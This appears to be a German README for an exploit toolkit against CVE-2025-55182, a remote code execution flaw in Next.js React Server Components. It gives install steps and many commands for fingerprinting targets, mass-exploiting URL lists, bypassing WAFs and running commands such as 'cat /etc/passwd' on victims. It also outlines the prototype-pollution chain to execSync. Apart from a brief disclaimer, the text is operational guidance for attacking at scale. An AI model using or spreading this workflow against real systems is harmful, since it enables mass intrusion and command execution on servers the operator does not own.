
Automatisiertes Erkennungs- und Ausnutzungs-Toolkit für CVE-2025-55182, eine kritische RCE in Next.js React Server Components. Bietet mehrschichtiges Fingerprinting, WAF-Bypass und Massenscanning für Penetrationstests.
Ein umfassendes Sicherheitsforschungswerkzeug zum Testen der Remote-Code-Ausführungsschwachstelle (CVE-2025-55182) in Next.js React Server Components.
Dieses Toolkit bietet automatisierte Erkennungs- und Exploit-Funktionen für CVE-2025-55182, eine kritische RCE-Schwachstelle, die Next.js-Anwendungen mit React Server Components betrifft. Das Toolkit besteht aus drei integrierten Komponenten:
requests-Bibliothekpip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
Der schnellste Weg, Ziele zu scannen und auszunutzen:
# Erstellen Sie eine Datei mit Ziel-URLs (eine pro Zeile)
echo "https://example.com" > targets.txt
# Automatischer Scan und Exploit in einem Befehl
./auto_exploit.sh -i targets.txt -s -c "id"
Next.js-Anwendungen ohne Exploit identifizieren:
python3 NextApp.py targets.txt
Ausgabedateien:
confirmed_nextjs_targets.txt - Alle erkannten Next.js-Anwendungenhigh_confidence_nextjs_targets.txt - Nur Erkennungen mit hoher VertrauenswürdigkeitEinzelne Ziele testen:
# Grundlegender Exploit
./exploit.sh -d https://target.com -c "whoami"
# Mit WAF-Bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Benutzerdefinierte WAF-Bypass-Größe
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# SSL-Verifizierung überspringen
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Schritt 1: Next.js-Anwendungen erkennen
python3 NextApp.py targets.txt
# Schritt 2: Bestätigte Ziele ausnutzen
./auto_exploit.sh -c "id"
# Vollständiger Auto-Scan mit WAF-Bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Benutzerdefinierte Verzögerungen und Timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# SSL-Verifizierung im Bulk-Modus überspringen
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
Argumente:
targets_file - Textdatei mit Ziel-URLs (eine pro Zeile)./exploit.sh [OPTIONEN]
Optionen:
./auto_exploit.sh [OPTIONEN]
Optionen:
Erzeugt von NextApp.py – enthält alle als Next.js-Anwendungen identifizierten URLs.
Erzeugt von NextApp.py – enthält nur Next.js-Erkennungen mit hoher Vertrauenswürdigkeit (Vertrauenspunktzahl 100+).
Erzeugt von auto_exploit.sh – umfassender Exploit-Bericht mit:
Der Scanner verwendet mehrere Erkennungstechniken mit einem Vertrauensbewertungssystem:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 Punkte)_next/* Asset-Pfade (25-75 Punkte basierend auf Menge)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTVertrauensschwellen:
Der Exploit nutzt eine Prototype-Pollution-Kette in Next.js React Server Components:
__proto__-Kette über JSON-Deserialisierung_response._prefixprocess.mainModule.require('child_process').execSync() ausX-Action-Redirect-HeaderDas Toolkit enthält integrierte WAF-Bypass-Funktionen:
Aktivieren mit den Flags -w oder --waf-bypass.
# Zielliste erstellen
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Einheitlichen Scan ausführen
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Ergebnisse prüfen
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Schritt 1: Erkennen und filtern
python3 NextApp.py targets.txt
# Schritt 2: Nur Ziele mit hoher Vertrauenswürdigkeit ausnutzen
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
Dieses Werkzeug ist nur für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Benutzer müssen:
Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch dieses Werkzeugs.
Dank an die Sicherheitsforscher, die diese Schwachstelle entdeckt und offengelegt haben:
Beiträge sind willkommen! Bitte:
Bei Problemen, Fragen oder Funktionswünschen eröffnen Sie bitte ein Issue auf GitHub.
Dieses Projekt wird für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Nutzen Sie es verantwortungsvoll und ethisch.
| Option | Beschreibung | Standard |
|---|
-d, --domain | Ziel-Domain/URL | http://localhost:3000 |
-f, --file | Datei mit Zielliste | - |
-c, --command | Auszuführender Befehl | id |
-w, --waf-bypass | WAF-Bypass aktivieren | Deaktiviert |
--waf-size SIZE | WAF-Bypass-Datengröße (KB) | 128 |
--timeout SECONDS | Request-Timeout | 15 |
-k, --insecure | SSL-Verifizierung überspringen | Deaktiviert |
--user-agent AGENT | Benutzerdefinierter User-Agent | Mozilla/5.0... |
-h, --help | Hilfemeldung anzeigen | - |
| Option | Beschreibung | Standard |
|---|
-i, --input FILE | Eingabe-Zieldatei | confirmed_nextjs_targets.txt |
-o, --output FILE | Ausgabe-Ergebnisdatei | exploit_results.txt |
-c, --command CMD | Auszuführender Befehl | id |
-w, --waf-bypass | WAF-Bypass aktivieren | Deaktiviert |
--waf-size SIZE | WAF-Bypass-Größe (KB) | 128 |
--timeout SECONDS | Request-Timeout | 15 |
-k, --insecure | SSL-Verifizierung überspringen | Deaktiviert |
--delay SECONDS | Verzögerung zwischen Requests | 2 |
-s, --scan | Automatischer Scan zuerst für Next.js | Deaktiviert |
-h, --help | Hilfemeldung anzeigen | - |